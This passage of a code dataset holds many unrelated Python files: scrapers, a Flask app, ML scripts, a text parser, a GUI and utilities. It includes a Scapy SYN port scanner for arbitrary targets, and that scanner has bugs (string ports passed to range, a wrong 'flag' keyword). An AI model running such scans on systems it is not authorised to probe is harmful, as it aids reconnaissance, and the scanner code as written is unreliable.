closed(self, reason):\n pass\n\n\n# TODO: 定价的匹配有问题\n_book_pattern = re.compile(r'(?:作者:(.*?))?'\n r'(?:出版社:(.*?))?'\n r'(?:出品方:(.*?))?'\n r'(?:副标题:(.*?))?'\n r'(?:原作名:(.*?))?'\n r'(?:译者:(.*?))?'\n r'(?:出版年:(.*?))?'\n r'(?:页数:(.*?))?'\n r'定价:.*?(\\d+\\.?\\d+?)', re.S | re.M)\n\n\n_mm = ((0, 'author'), (1, 'press'), (4, 'original'),\n (5, 'translator'), (6, 'date'), (7, 'pages'),\n (8, 'price'))\n\n\ndef _book_info(text, trim_tags=True, trim_crlf=True, trim_extra_spaces=True):\n attr = {}\n if trim_tags:\n text = strip_tags(text)\n if trim_crlf:\n text = WHITE_PATTERN.sub('', text)\n if trim_extra_spaces:\n text = merge_white(text)\n\n text = unescape(text)\n\n result = _book_pattern.search(text)\n gps = result.groups()\n for idx, k in _mm:\n if gps[idx] is not None:\n attr[k] = gps[idx].strip()\n else:\n attr[k] = ''\n return attr\n","sub_path":"app/spiders/douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"311374020","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport importlib\nimport os\n\nfrom ansible.plugins.lookup import LookupBase\n\nclass LookupModule (LookupBase):\n\n\tdef __init__ (self, * arguments, ** keyword_arguments):\n\n\t\tself.support = (\n\t\t\timportlib.import_module (\n\t\t\t\tos.environ [\"GRIDLINKER_SUPPORT\"]).support)\n\n\t\tself.context = (\n\t\t\tself.support.get_context ())\n\n\t\tself.client = (\n\t\t\tself.context.client)\n\n\t\tLookupBase.__init__ (\n\t\t\tself,\n\t\t\t* arguments,\n\t\t\t** keyword_arguments)\n\n\tdef run (self, terms, variables, ** keyword_arguments):\n\n\t\tret = []\n\n\t\tfor term in terms:\n\n\t\t\tkey = term.split () [0]\n\n\t\t\tvalue = self.client.exists (key)\n\n\t\t\tif value:\n\t\t\t\tret.append (\"yes\")\n\n\t\t\telse:\n\t\t\t\tret.append (\"no\")\n\n\t\treturn ret\n\n# ex: noet ts=4 filetype=python\n","sub_path":"misc/ansible-lookup-plugins/etcd_exists.py","file_name":"etcd_exists.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"192063389","text":"#These functions will display various patterns (i.e. chaser, alternating, twinkling)\r\n#File will not work unless executed on a raspberry pi connected to an 8 channel relay board\r\nimport RPi.GPIO as gp\r\n\r\nimport time\r\nfrom time import sleep\r\n\r\nimport threading\r\nfrom threading import Thread\r\n\r\n#Set GPIO pin mode to broadcom\r\ngp.setmode(gp.BCM)\r\ndef gpmode():\r\n gp.setmode(gp.BCM)\r\n\r\n\r\n#Deactivate warnings in console\r\ngp.setwarnings(False)\r\n\r\n#Active GPIO pins in relay board\r\npList = [2, 3, 4, 17, 27, 22, 10, 9]\r\n\r\npListEven = [3, 17, 22, 9]\r\npListOdd = [2, 4, 27, 10]\r\n\r\npListHalf1 = [2, 3, 4, 17]\r\npListHalf2 = [27, 22, 10, 9]\r\n\r\n#2 is In1\r\n#3 is In2\r\n#4 is In3\r\n#17 is In4\r\n#27 is In5\r\n#22 is In6\r\n#10 is In7\r\n#9 is In8\r\n\r\nfor i in pList:\r\n gp.setup(i, gp.OUT)\r\n gp.output(i, gp.HIGH)\r\n\r\ndef oputMode():\r\n for i in pList:\r\n gp.setup(i, gp.OUT)\r\n gp.output(i, gp.HIGH)\r\n \r\n#Rest times\r\nrestBlink = .1\r\nrestQuarter = .25\r\nrestHalf = .5\r\nrestFull = 1\r\nrestTwoFull = 2\r\nrestLong = 5\r\nrestHibernate = 10\r\n\r\n#GPIO input/output controls\r\nlow = gp.LOW\r\nhigh = gp.HIGH\r\noput = gp.output\r\n\r\ndef reset():\r\n gpmode();\r\n oputMode();\r\n gp.cleanup()\r\n","sub_path":"relayPatterns.py","file_name":"relayPatterns.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"49087726","text":"from scapy.all import *\nimport sys\nimport logging\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.error)\n\nif len(sys.argv) != 4: # python portScanner_Test.py 127.0.0.1 22 65500\n print(\"usage: %s target startport endport\" % (sys.argv[0]))\n sys.exit(0)\n\ntarget = str(sys.argv[1])\nstartport = str(sys.argv[2])\nendport = str(sys.argv[3])\nprint(\"Scanning \"+target + \"for open TCP ports\")\n\nif startport == endport:\n endport += 1\n\nfor x in range(startport, endport):\n packet = IP(dst=target)/TCP(dport=x, flag='S')\n response = sr1(packet, timeout=0.5, verbose=0)\n # 0x12 code for syn-ack\n if response.haslayer(TCP) and response.getlayer(TCP).flag == 0x12:\n print(\"Port \"+str(x)+\" is open!\")\n sr(IP(dst=target)/TCP(dport=response.sport, flag=\"R\"),\n timeout=0.5, verbose=0) # R in scapy is for RST\n\nprint(\"Scan is complete!z\\n\")\n","sub_path":"portScanner_Test.py","file_name":"portScanner_Test.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"62367553","text":"# Import dependencies\nfrom flask import Flask, render_template\nfrom flask_pymongo import PyMongo\nimport scraping\n\n# Set up Flask\napp = Flask(__name__)\n\n# Use flask_pymongo to set up mongo connection\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/mars_app\"\nmongo = PyMongo(app)\n\n# Define the route for the HTML page\n@app.route(\"/\")\ndef index():\n mars = mongo.db.mars.find_one()\n return render_template(\"index.html\", mars=mars)\n\n# Add next route for scraping\n@app.route(\"/scrape\")\ndef scrape():\n mars = mongo.db.mars\n mars_data = scraping.scrape_all()\n mars.update({}, mars_data, upsert=True)\n return render_template(\"scrape.html\")\n\n# Add routes for hemisphere images\n@app.route(\"/img1\")\ndef img1():\n mars = mongo.db.mars.find_one()\n return render_template(\"img1.html\", mars=mars)\n\n@app.route(\"/img2\")\ndef img2():\n mars = mongo.db.mars.find_one()\n return render_template(\"img2.html\", mars=mars)\n\n@app.route(\"/img3\")\ndef img3():\n mars = mongo.db.mars.find_one()\n return render_template(\"img3.html\", mars=mars)\n\n@app.route(\"/img4\")\ndef img4():\n mars = mongo.db.mars.find_one()\n return render_template(\"img4.html\", mars=mars)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"apps/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"253432886","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 1 16:43:05 2017\n\n@author: gualandi\n\"\"\"\nimport time\nimport csv\nimport numpy as np\n\nfrom numpy import genfromtxt\nfrom matplotlib import plt\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import accuracy_score\n\n\ndef DrawDigit(A, label=''):\n \"\"\" Draw single digit as a greyscale matrix\"\"\"\n fig = plt.figure(figsize=(6,6))\n # Uso la colormap 'gray' per avere la schacchiera in bianco&nero\n img = plt.imshow(A, cmap='gray_r')\n plt.xlabel(label)\n plt.show()\n \ndef ElaborateTrainingSet(data):\n \"\"\" Elaborate training set \"\"\"\n X = []\n Y = [] \n for row in data:\n X.append(np.array(row[1:]))\n Y.append(int(row[0])) \n return X, Y\n\ndef ElaborateTestSet(data):\n \"\"\" Elaborate test set \"\"\"\n X = []\n for row in data:\n X.append(np.array(row))\n return X\n\ndef LearnANN(data):\n \"\"\" Learn an Artificial Neural Network and return the corresponding object \"\"\"\n x_train, y_train = ElaborateTrainingSet(data) \n \n # PRIMA DI FARE QUESTO ESERCIZIO, STUDIARE IL TUTORIAL:\n # http://scikit-learn.org/stable/modules/neural_networks_supervised.html\n #\n # ESERCIZIO DA FARE: PROVARE I DIVERSI PARAMETRI DI QUESTA CLASSE\n # http://scikit-learn.org/stable/modules/generated/sklearn.neural_network.MLPClassifier.html\n ann = MLPClassifier(hidden_layer_sizes=(1), random_state=1)\n ann.fit(x_train, y_train)\n return ann\n\ndef TestANN(ann, x_test, y_test):\n \"\"\" Test the learned ANN on the given set of data \"\"\"\n y_pred = ann.predict(x_test)\n \n print(\"Accuracy: \", accuracy_score(y_test, y_pred), ' - Number of itertions:', ann.n_iter_)\n \n # Write the predictinos in a .csv file\n with open('solution.csv','w') as csv_file:\n writer = csv.writer(csv_file, delimiter=',', lineterminator='\\n')\n writer.writerow(['ImageId','Label'])\n for i,p in enumerate(y_pred):\n writer.writerow([i+1,p])\n\n\ndef EvaluateANN(ann, x_test):\n \"\"\" Test the learned ANN and produce output for Kaggle \"\"\"\n start = time.time()\n \n y_pred = ann.predict(x_test)\n \n print('Evaluation time:', time.time()-start,'- size:', len(my_test)) \n print('Number of itertions:', ann.n_iter_)\n \n # Write the predictinos in a .csv file\n with open('solution.csv','w') as csv_file:\n writer = csv.writer(csv_file, delimiter=',', lineterminator='\\n')\n writer.writerow(['ImageId','Label'])\n for i,p in enumerate(y_pred):\n writer.writerow([i+1,p])\n \n\n#------------------------------------------\n# MAIN ENTRY POINT\n#------------------------------------------\nif __name__ == \"__main__\":\n # Misura il tempo per le operazioni principali\n start = time.time()\n \n # Fase 1: Training\n # Read CSV from Numpy, Link:\n # https://docs.scipy.org/doc/numpy/reference/generated/numpy.genfromtxt.html\n my_data = genfromtxt('Projects/MINST/train.csv', delimiter=',', skip_header=1) \n print('Reading time:', time.time()-start)\n start = time.time()\n\n # Cambia in True per plottare alcune immagine\n if False:\n for row in my_data[:9]:\n # Documentation for function 'reshape':\n # https://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html\n A = np.array(row[1:]).reshape(28,28) \n DrawDigit(A, 'Digit: ' + str(int(row[0])))\n\n ann = LearnANN(my_data)\n \n print('Learning time:', time.time()-start, '- size:', len(my_data))\n \n # Fase 2: local test for learning of parameters\n # TODO\n \n # Fase 3: Evaluate on Kaggle test set\n my_test = genfromtxt('Projects/MINST/test.csv', delimiter=',', skip_header=1)\n x_test = ElaborateTestSet(my_test) \n EvaluateANN(ann, x_test)\n \n \n\n\n\n\n\n\n\n","sub_path":"python/ann_minst.py","file_name":"ann_minst.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"549735954","text":"def merge_sort(numbers):\n\tif len(numbers) >= 2:\n\t\tlist1 = [numbers[x] for x in range(0, int(0.5*len(numbers)))]\n\t\tlist2 = [numbers[y] for y in range(int(0.5*len(numbers)), len(numbers))]\n\t\tlist3 = merge_sort(list1)\n\t\tlist4 = merge_sort(list2)\n\t\ti = 0\n\t\tj = 0\n\t\tsortedlist =[]\n\t\twhile i < len(list3) and j < len(list4):\n\t\t\tif list3[i] < list4[j]:\n\t\t\t\tsortedlist.append(list3[i])\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tsortedlist.append(list4[j])\n\t\t\t\tj += 1\n\t\twhile i < len(list3) or j < len(list4):\n\t\t\tif i < len(list3):\n\t\t\t\tsortedlist.append(list3[i])\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tsortedlist.append(list4[j])\n\t\t\t\tj += 1\n\t\treturn sortedlist\n\telse:\n\t\treturn numbers\n\ndef main():\n\tnumbers = [5,4,1,8,7,9,6,2,3]\n\tprint (merge_sort(numbers))\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"week1/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"393656892","text":"import os\n\nimport tensorflow as tf\n\n\ndef lpips(input0, input1, model='net-lin', net='alex', version=0.1):\n \"\"\"\n Learned Perceptual Image Patch Similarity (LPIPS) metric.\n\n Args:\n input0: An image tensor of shape `[..., height, width, channels]`,\n with values in [0, 1].\n input1: An image tensor of shape `[..., height, width, channels]`,\n with values in [0, 1].\n\n Returns:\n The Learned Perceptual Image Patch Similarity (LPIPS) distance.\n\n Refenrece:\n Richard Zhang, Phillip Isola, Alexei A. Efros, Eli Shechtman, Oliver Wang.\n The Unreasonable Effectiveness of Deep Features as a Perceptual Metric.\n In CVPR, 2018.\n \"\"\"\n # flatten the leading dimensions\n batch_shape = tf.shape(input0)[:-3]\n input0 = tf.reshape(input0, tf.concat([[-1], tf.shape(input0)[-3:]], axis=0))\n input1 = tf.reshape(input1, tf.concat([[-1], tf.shape(input1)[-3:]], axis=0))\n # NCHW to NHWC\n input0 = tf.transpose(input0, [0, 3, 1, 2])\n input1 = tf.transpose(input1, [0, 3, 1, 2])\n # normalize to [-1, 1]\n input0 = input0 * 2.0 - 1.0\n input1 = input1 * 2.0 - 1.0\n\n input0_name, input1_name = '0:0', '1:0'\n pb_fname = os.path.join(os.path.dirname(__file__), 'models/v%s/%s_%s.pb' % (version, model, net))\n with open(pb_fname, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def,\n input_map={input0_name: input0, input1_name: input1})\n distance, = tf.get_default_graph().get_operations()[-1].outputs\n\n if distance.shape.ndims == 4:\n distance = tf.squeeze(distance, axis=[-3, -2, -1])\n # reshape the leading dimensions\n distance = tf.reshape(distance, batch_shape)\n return distance\n","sub_path":"lpips.py","file_name":"lpips.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"89020560","text":"\"\"\"\n2161. Partition Array According to Given Pivot\n\nYou are given a 0-indexed integer array nums and an integer pivot. Rearrange nums such that the following conditions are satisfied:\n\n Every element less than pivot appears before every element greater than pivot.\n Every element equal to pivot appears in between the elements less than and greater than pivot.\n The relative order of the elements less than pivot and the elements greater than pivot is maintained.\n More formally, consider every pi, pj where pi is the new position of the ith element and pj is the new position of the jth element. For elements less than pivot, if i < j and nums[i] < pivot and nums[j] < pivot, then pi < pj. Similarly for elements greater than pivot, if i < j and nums[i] > pivot and nums[j] > pivot, then pi < pj.\n\nReturn nums after the rearrangement.\n\n \n\nExample 1:\n\nInput: nums = [9,12,5,10,14,3,10], pivot = 10\nOutput: [9,5,3,10,10,12,14]\nExplanation: \nThe elements 9, 5, and 3 are less than the pivot so they are on the left side of the array.\nThe elements 12 and 14 are greater than the pivot so they are on the right side of the array.\nThe relative ordering of the elements less than and greater than pivot is also maintained. [9, 5, 3] and [12, 14] are the respective orderings.\n\nExample 2:\n\nInput: nums = [-3,4,3,2], pivot = 2\nOutput: [-3,2,4,3]\nExplanation: \nThe element -3 is less than the pivot so it is on the left side of the array.\nThe elements 4 and 3 are greater than the pivot so they are on the right side of the array.\nThe relative ordering of the elements less than and greater than pivot is also maintained. [-3] and [4, 3] are the respective orderings.\n\n \nConstraints:\n\n 1 <= nums.length <= 105\n -106 <= nums[i] <= 106\n pivot equals to an element of nums.\n\n\"\"\"\n\n\nfrom typing import List\n\n\nclass Solution:\n def pivotArray(self, nums: List[int], pivot: int) -> List[int]:\n ans = []\n\n nums.remove(pivot)\n\n i = 0\n ans.append(pivot)\n\n for j in nums:\n if j < pivot:\n ans.insert(i, j)\n i = i+1\n elif j == pivot:\n ans.insert(i+1, j)\n else:\n ans.append(j)\n\n return ans\n\n\nclass Solution:\n # Simple solution faster than 99.7%\n def pivotArray(self, nums: List[int], pivot: int) -> List[int]:\n small_list = [item for item in nums if item < pivot]\n large_list = [item for item in nums if item > pivot]\n pivot_count = nums.count(pivot)\n return small_list + [pivot]*pivot_count + large_list\n\n\nclass Solution:\n def pivotArray(self, nums: List[int], pivot: int) -> List[int]:\n # (n log n)\n def key(v):\n if v < pivot:\n return -1\n if v > pivot:\n return 1\n return 0\n return sorted(nums, key=key)\n","sub_path":"leetcode/Medium/_2161.Partition_Array_According_to_Given_Pivot.py","file_name":"_2161.Partition_Array_According_to_Given_Pivot.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"75766442","text":"# -*- coding:utf-8 -*-\nfrom requests_oauthlib import OAuth1Session\nimport json\nimport time\nimport pandas as pd\nfrom oauth_key import *\n\nurl = \"https://api.twitter.com/1.1/statuses/home_timeline.json\"\n\n#データを指定の個数分取得���る変数\nparams = { 'count': 10 }\n\nTweetList = []\n\ntwitter = OAuth1Session(consumer_key, consumer_secret, access_key, access_secret)\n\n#指定の回数分paramsを取得\nfor i in range(5):\n req = twitter.get(url, params = params)\n\n #ステータスコード200(正常にアクセス)ならデータをTweetListへ格納\n if req.status_code == 200:\n timeline = json.loads(req.text)\n for tweet in timeline:\n TweetList.append(tweet[\"text\"])\n\n #エラーなら取得したステータスコードを出力\n else:\n print(\"Error: %d\" % req.status_code)\n\n #1回取得したら1秒待つ\n time.sleep(1)\n\ndf = pd.DataFrame(TweetList)\ndf.to_csv('hogehoge.csv')\n","sub_path":"get_text.py","file_name":"get_text.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"160119020","text":"# -*- coding: utf-8 -*-\nimport codecs\nimport regex\nfrom sefaria.model import *\nfrom sources import functions\nfrom parsing_utilities import util\n# from sources.Match import match_new\nfrom sources.Match.match import Match\nfrom sefaria.model.schema import AddressTalmud, SchemaNode, JaggedArrayNode\n\n\ndef create_index():\n rabbeinu_yonah_schema = create_schema()\n rabbeinu_yonah_schema.validate()\n index = {\n \"title\": \"Rabbeinu Yonah on Pirkei Avot\",\n \"categories\": [\"Commentary2\", \"Pirkei Avot\", \"Rabbeinu Yonah\"],\n \"schema\": rabbeinu_yonah_schema.serialize()\n }\n return index\n\ndef create_schema():\n rb_schema = JaggedArrayNode()\n rb_schema.add_title('Rabbeinu Yonah on Pirkei Avot', 'en', primary=True)\n rb_schema.add_title(u'רבינו יונה על פרקי אבות', 'he', primary=True)\n rb_schema.key = 'Rabbeinu Yonah on Pirkei Avot'\n rb_schema.depth = 3\n rb_schema.addressTypes = [\"Integer\", \"Integer\", \"Integer\"]\n rb_schema.sectionNames = [\"Perek\", \"Mishna\", \"Comment\"]\n return rb_schema\n\n\ndef parse_and_post(file_name):\n mishna_number_regex = regex.compile(u'([\\u05d0-\\u05ea]{1,3})')\n rb_yonah_on_avot, perek_level_list, mishna_level_list = [], [], []\n new_perek, first_perek = True, True\n last_mishna = 0\n with codecs.open(file_name, 'r', 'utf-8') as the_file:\n for each_line in the_file:\n\n if \"@00\" in each_line:\n if not first_perek:\n perek_level_list.append(mishna_level_list)\n rb_yonah_on_avot.append(perek_level_list)\n perek_level_list, mishna_level_list = [], []\n new_perek = True\n\n else:\n first_perek = False\n\n elif \"@22\" in each_line:\n if not new_perek:\n perek_level_list.append(mishna_level_list)\n mishna_level_list = []\n\n match_object = mishna_number_regex.search(each_line)\n mishna_number = util.getGematria(match_object.group(1))\n diff = mishna_number - last_mishna\n while diff > 1:\n perek_level_list.append([])\n diff -= 1\n\n last_mishna = mishna_number\n\n else:\n new_perek = False\n last_mishna = 1\n\n else:\n divided_string = each_line.split(u'~')\n for line in divided_string:\n line = line.strip()\n if line:\n line = clean_up_string(line)\n mishna_level_list.append(line)\n\n rb_yonah_on_avot.append(perek_level_list)\n post_the_text(rb_yonah_on_avot)\n return rb_yonah_on_avot\n\n\ndef clean_up_string(string):\n string = remove_substrings(string, ['@11', '@33'])\n return string\n\n\ndef remove_substrings(string, list_of_tags):\n for tag in list_of_tags:\n string = string.replace(tag, '')\n return string\n\n\ndef post_the_text(ja):\n testing_file = codecs.open(\"testing_file.txt\", 'w', 'utf-8')\n util.jagged_array_to_file(testing_file, ja, ['Perek', 'Mishna', 'Comment'])\n testing_file.close()\n ref = create_ref()\n text = create_text(ja)\n functions.post_text(ref, text)\n\n\ndef create_ref():\n ref = 'Rabbeinu Yonah on Pirkei Avot'\n return ref\n\n\ndef create_text(jagged_array):\n return {\n \"versionTitle\": \"Pirkei Avot, Berlin, 1848\",\n \"versionSource\": \"http://primo.nli.org.il/primo_library/libweb/action/dlDisplay.do?vid=NLI&docId=NNL_ALEPH001063744\",\n \"language\": \"he\",\n \"text\": jagged_array\n }\n\n\ndef create_links(rb_ja):\n list_of_links = []\n for perek_index, perek in enumerate(rb_ja):\n for mishna_index, mishna in enumerate(perek):\n for comment_index, comment in enumerate(mishna):\n list_of_links.append(create_link_dicttionary(perek_index+1, mishna_index+1, comment_index+1))\n functions.post_link(list_of_links)\n\n\ndef create_link_dicttionary(perek_bumber, mishna_number, comment_index):\n return {\n \"refs\": [\n \"Pirkei Avot {}.{}\".format(perek_bumber, mishna_number),\n \"Rabbeinu Yonah on Pirkei Avot {}.{}.{}\".format(perek_bumber, mishna_number, comment_index)\n ],\n \"type\": \"commentary\",\n }","sub_path":"sources/Rabbeinu_Yonah_Avot/rb_yonah_functions.py","file_name":"rb_yonah_functions.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"459789318","text":"\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(700, 600)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.centralwidget)\r\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\r\n self.horizontalLayout = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n \r\n # text layout\r\n self.textLayout = QtWidgets.QVBoxLayout()\r\n self.textLayout.setContentsMargins(20, 20, 20, 0)\r\n self.textLayout.setObjectName(\"textLayout\")\r\n #code label\r\n self.codeLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.codeLabel.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.codeLabel.setObjectName(\"codeLabel\")\r\n self.textLayout.addWidget(self.codeLabel)\r\n #code text\r\n self.codeText = QtWidgets.QTextEdit(self.centralwidget)\r\n self.codeText.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.codeText.setObjectName(\"codeText\")\r\n self.textLayout.addWidget(self.codeText)\r\n #spacer\r\n spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.textLayout.addItem(spacerItem)\r\n # result label\r\n self.resutLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.resutLabel.setObjectName(\"resutLabel\")\r\n self.textLayout.addWidget(self.resutLabel)\r\n #result text\r\n self.resultText = QtWidgets.QTextEdit(self.centralwidget)\r\n self.resultText.setObjectName(\"resultText\")\r\n self.textLayout.addWidget(self.resultText)\r\n self.horizontalLayout.addLayout(self.textLayout)\r\n #button layout\r\n self.buttonLayout = QtWidgets.QVBoxLayout()\r\n self.buttonLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)\r\n self.buttonLayout.setContentsMargins(-1, -1, 10, -1)\r\n self.buttonLayout.setSpacing(0)\r\n self.buttonLayout.setObjectName(\"buttonLayout\")\r\n #new button\r\n self.newButton = QtWidgets.QPushButton(self.centralwidget)\r\n icon = QtGui.QIcon()\r\n icon.addPixmap(QtGui.QPixmap(\"icons/new.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\r\n self.newButton.setIcon(icon)\r\n self.newButton.setIconSize(QtCore.QSize(24, 24))\r\n self.newButton.setObjectName(\"newButton\")\r\n self.buttonLayout.addWidget(self.newButton)\r\n self.newButton.clicked.connect(self.new)\r\n #analyse button\r\n self.analyseButton = QtWidgets.QPushButton(self.centralwidget)\r\n icon1 = QtGui.QIcon()\r\n icon1.addPixmap(QtGui.QPixmap(\"icons/analyse.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\r\n self.analyseButton.setIcon(icon1)\r\n self.analyseButton.setIconSize(QtCore.QSize(24, 24))\r\n self.analyseButton.setObjectName(\"analyseButton\")\r\n self.buttonLayout.addWidget(self.analyseButton)\r\n self.analyseButton.clicked.connect(self.analyse)\r\n #compile button\r\n self.compileButton = QtWidgets.QPushButton(self.centralwidget)\r\n icon2 = QtGui.QIcon()\r\n icon2.addPixmap(QtGui.QPixmap(\"icons/compile.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\r\n self.compileButton.setIcon(icon2)\r\n self.compileButton.setIconSize(QtCore.QSize(24, 24))\r\n self.compileButton.setObjectName(\"compileButton\")\r\n self.buttonLayout.addWidget(self.compileButton) \r\n self.compileButton.clicked.connect(self.runCompile)\r\n\r\n self.horizontalLayout.addLayout(self.buttonLayout)\r\n self.horizontalLayout_2.addLayout(self.horizontalLayout)\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n\r\n \r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\r\n self.codeLabel.setText(_translate(\"MainWindow\", \"Code goes here\"))\r\n self.codeText.setToolTip(_translate(\"MainWindow\", \"Type Code here\"))\r\n self.resutLabel.setText(_translate(\"MainWindow\", \"Result\"))\r\n self.newButton.setText(_translate(\"MainWindow\", \"New\"))\r\n self.analyseButton.setText(_translate(\"MainWindow\", \"Analyse\"))\r\n self.compileButton.setText(_translate(\"MainWindow\", \"Compile\"))\r\n \r\n def new (self):\r\n self.codeText.clear()\r\n self.resultText.clear()\r\n \r\n def analyse(self):\r\n self.resultText.clear()\r\n self.resultText.setText(self.codeText.toPlainText())\r\n \r\n def runCompile(self):\r\n self.resultText.clear()\r\n #run compile\r\n #self.resultText.setText(\"something\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"interface/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"30423472","text":"from die import Die\nimport pygal\n\ndie = Die()\nresults = []\n# 模拟1000次掷六面骰子\nfor roll in range(1000):\n result = die.roll()\n results.append(result)\nprint(results)\n\nfrequencies = []\n# 统计每个点数出现的次数\nfor value in range(1, die.num_sides + 1):\n frequency = results.count(value)\n frequencies.append(frequency)\nprint(frequencies)\n\nhist = pygal.Bar()\nhist.title = \"Results of rolling one D6 1000 times.\"\n# x轴的标签\nhist.x_labels = ['1', '2', '3', '4', '5', '6']\n# 坐标轴的名称\nhist._x_title = \"Result\"\nhist._y_title = \"Frequency of Results\"\n# 将获取到的数据列表加入,并标签为'D6'\nhist.add('D6', frequencies)\n# 将图表渲染成SVG文件,可在浏览器中打开,具有交互性,数据发生变化,只需刷新网页即可看到变化\nhist.render_to_file('die_simulation.svg')\n","sub_path":"die_simulation.py","file_name":"die_simulation.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"85738794","text":"# yapf: disable\nfrom copy import deepcopy\n\n# Default Parameters\ndefault_params = {\n # config summary\n \"algo\": \"NF\",\n \"config\": \"default\",\n # environment config\n \"env_name\": \"InvertedPendulum-v2\",\n \"r_scale\": 1.0,\n \"r_shift\": 0.0,\n \"eps_length\": 0,\n \"env_args\": {},\n \"fix_T\": False,\n # learner\n \"pretrained\": None,\n \"offline_num_epochs\": int(1e3),\n \"offline_num_batches_per_epoch\": 1000,\n \"random_expl_num_cycles\": int(0),\n \"num_epochs\": int(0),\n \"num_cycles_per_epoch\": 1,\n \"num_batches_per_cycle\": 1000,\n \"expl_num_episodes_per_cycle\": None,\n \"expl_num_steps_per_cycle\": 1000,\n \"eval_num_episodes_per_cycle\": 0,\n \"eval_num_steps_per_cycle\": None,\n # agent config\n \"agent\": {\n \"offline_batch_size\": 256,\n # replay buffer setup\n \"buffer_size\": int(1e6),\n # normalize observation\n \"norm_obs_offline\": True,\n \"norm_eps\": 0.01,\n \"norm_clip\": 5,\n # critic network\n \"q_lr\": 3e-4,\n \"layer_sizes\": [256, 256],\n # maf\n \"maf_lr\": 2e-4,\n \"maf_layer_sizes\": [256, 256],\n \"num_bijectors\": 4,\n \"prm_loss_weight\": 1.,\n \"reg_loss_weight\": 100.,\n \"logprob_scale\": 1.,\n \"min_logprob\": -5.0,\n },\n \"seed\": 0,\n}\n\n# OpenAI Gym\ngym_mujoco_params = deepcopy(default_params)","sub_path":"rlfd/rlfd/params/nf.py","file_name":"nf.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"315184830","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 19 21:45:59 2018\n\n@author: Arash\n\"\"\"\n\n#%%\nimport csv\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Convolution2D, 